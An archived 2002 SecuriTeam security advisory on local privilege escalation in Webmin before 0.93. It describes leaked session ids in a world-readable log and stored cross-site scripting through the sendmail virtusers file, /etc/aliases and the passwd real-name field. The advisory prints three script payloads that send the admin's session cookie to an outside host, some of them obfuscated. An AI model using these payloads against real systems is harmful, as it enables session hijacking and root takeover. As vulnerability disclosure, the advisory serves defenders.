[UNIX] Local Privilege Escalation Issues with Webmin
From: support@securiteam.comDate: 03/22/02
- Previous message: support@securiteam.com: "[NEWS] Default SNMP Configuration Issue with Foundry Networks EdgeIron 4802F"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
From: support@securiteam.com To: list@securiteam.com Date: Fri, 22 Mar 2002 11:51:22 +0100 (CET)
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
When was the last time you checked your server's security?
How about a monthly report?
http://www.AutomatedScanning.com - Know that you're safe.
- - - - - - - - -
Local Privilege Escalation Issues with Webmin
------------------------------------------------------------------------
SUMMARY
<http://www.webmin.com/> Webmin is a web-based interface for system
administration for UNIX. Using any browser that supports tables and forms
(and Java for the File Manager module), you can setup user accounts,
Apache, DNS, file sharing and so on. The product has been found to contain
numerous security vulnerabilities, those more severe (allowing privileges
escalation) are listed below.
DETAILS
Vulnerable systems:
Webmin versions prior to 0.93
Immune systems:
Webmin version 0.93
Problem #1:
Version 0.92-1 of Webmin (when installed by rpm) leaves insecure
permissions on the /var/webmin directory. This means that if command
logging within webmin is enabled, any local user can read the
/var/webmin/webmin.log file and retrieve the root users sid (cookie
session id). It is trivial to then create a faked local cookie using this
session-id, and log directly into webmin as root.
Problem #2:
If a semi-trusted colleague is given a restricted level of access to some
Webmin functions, specifically sendmail, then malicious code can be
inserted into certain files that would result in revealing roots webmin
sid (cookie session id) when the root user visits the related page in
webmin.
Example Exploit:
Insert the following line into the virtusers file, and wait for the root
user to visit that page:
</tt></a></td><tt><td><script>/*
*/document.write('<imgsrc="http://192.168.40.1/'+document.cookie+'">');</script>
Or the following into the /etc/aliases file:
</a></td><td><tt><script>zz=unescape("%20");document.write('<img'/*:*/+zz+' src="http://10.1.1.33/'+document.cookie+'">');</script>
Potentially more likely to be exploited however, would be a malicious
local user who has _no_ access to webmin, who could change a file that
webmin views through the HTML interface (where the code being read in is
not checked for HTML). An example would be changing their 'real name' in
/etc/passwd to be something along the lines of:
<script>zz=unescape("%3A");document.write('<img
src="http'+zz+'//10.1.1.33/'+document.cookie+'">');</script>
(Although chfn doesn't let you specify a username this long, but you get
the idea)
This same problem exists in pretty much most parts of webmin, where files
(or command output like 'ps') is read in and displayed in the web
interface.
Solution:
Upgrade to the latest version of Webmin (0.93), which fixes these issues
(as well as a couple of others apparently). Available from:
<http://www.webmin.com/download.html> http://www.webmin.com/download.html
ADDITIONAL INFORMATION
The information has been provided by <mailto:advisory@prophecy.net.nz>
advisory@prophecy.net.nz.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: support@securiteam.com: "[NEWS] Default SNMP Configuration Issue with Foundry Networks EdgeIron 4802F"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
|
